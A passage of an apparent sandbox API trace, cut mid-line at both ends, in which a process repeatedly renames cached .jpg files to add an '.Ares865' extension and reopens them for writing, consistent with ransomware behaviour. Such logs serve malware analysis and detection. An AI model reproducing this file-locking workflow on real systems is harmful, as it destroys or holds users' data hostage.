"c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbimkp[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.752] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBImKp[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbimkp[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.752] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2428) returned 1 [0094.755] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMGJo[1].jpg.Ares865") returned 117 [0094.755] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMGJo[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmgjo[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMGJo[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmgjo[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.757] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMGJo[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmgjo[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.757] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10698) returned 1 [0094.760] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMKDF[1].jpg.Ares865") returned 117 [0094.760] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMKDF[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmkdf[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMKDF[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmkdf[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.761] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMKDF[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmkdf[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.761] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2146) returned 1 [0094.764] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMQch[1].jpg.Ares865") returned 117 [0094.764] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMQch[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmqch[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMQch[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmqch[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.765] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMQch[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmqch[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.766] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5166) returned 1 [0094.771] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMyVh[1].jpg.Ares865") returned 117 [0094.771] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMyVh[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmyvh[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMyVh[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmyvh[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.772] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBMyVh[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbmyvh[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.773] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15979) returned 1 [0094.776] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBNAf7[1].jpg.Ares865") returned 117 [0094.776] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBNAf7[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbnaf7[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBNAf7[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbnaf7[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.778] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBNAf7[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbnaf7[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.778] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2066) returned 1 [0094.780] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBNnTF[1].jpg.Ares865") returned 117 [0094.781] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBNnTF[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbnntf[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBNnTF[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbnntf[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.782] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBNnTF[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbnntf[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.782] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2850) returned 1 [0094.785] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBO4dZ[1].jpg.Ares865") returned 117 [0094.786] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBO4dZ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbo4dz[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBO4dZ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbo4dz[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.787] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBO4dZ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbo4dz[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.787] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5417) returned 1 [0094.790] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBO8ow[1].jpg.Ares865") returned 117 [0094.790] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBO8ow[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbo8ow[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBO8ow[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbo8ow[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.791] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBO8ow[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbo8ow[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.791] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7777) returned 1 [0094.794] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOaeS[1].jpg.Ares865") returned 117 [0094.795] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOaeS[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbboaes[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOaeS[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbboaes[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.796] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOaeS[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbboaes[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.796] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1590) returned 1 [0094.799] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOcIb[1].jpg.Ares865") returned 117 [0094.799] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOcIb[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbocib[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOcIb[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbocib[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.801] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOcIb[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbocib[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.801] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2090) returned 1 [0094.804] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOddp[1].jpg.Ares865") returned 117 [0094.804] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOddp[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbboddp[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOddp[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbboddp[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.805] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOddp[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbboddp[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.805] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5662) returned 1 [0094.808] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOmar[1].jpg.Ares865") returned 117 [0094.808] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOmar[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbomar[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOmar[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbomar[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.810] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBOmar[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbomar[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.810] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=22149) returned 1 [0094.814] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBR4yQ[1].jpg.Ares865") returned 117 [0094.814] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBR4yQ[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbr4yq[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBR4yQ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbr4yq[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.815] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBR4yQ[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbr4yq[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.816] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12139) returned 1 [0094.819] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBUPaj[1].jpg.Ares865") returned 117 [0094.819] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBUPaj[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbupaj[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBUPaj[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbupaj[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.820] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBUPaj[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbupaj[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.820] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9803) returned 1 [0094.823] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVEOW[1].jpg.Ares865") returned 117 [0094.824] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVEOW[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbveow[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVEOW[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbveow[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.825] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVEOW[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbveow[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.825] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15880) returned 1 [0094.829] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVLcG[1].jpg.Ares865") returned 117 [0094.829] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVLcG[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbvlcg[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVLcG[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbvlcg[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.830] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVLcG[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbvlcg[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.831] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2591) returned 1 [0094.836] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVSkP[1].jpg.Ares865") returned 117 [0094.836] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVSkP[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbvskp[1].jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVSkP[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbvskp[1].jpg.ares865"), dwFlags=0x1) returned 1 [0094.839] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Temporary Internet Files\\Low\\Content.IE5\\YG1R61Z8\\BBBVSkP[1].jpg.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\temporary internet files\\low\\content.ie5\\yg1r61z8\\bbbvskp[1].jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.839] GetFileSizeEx 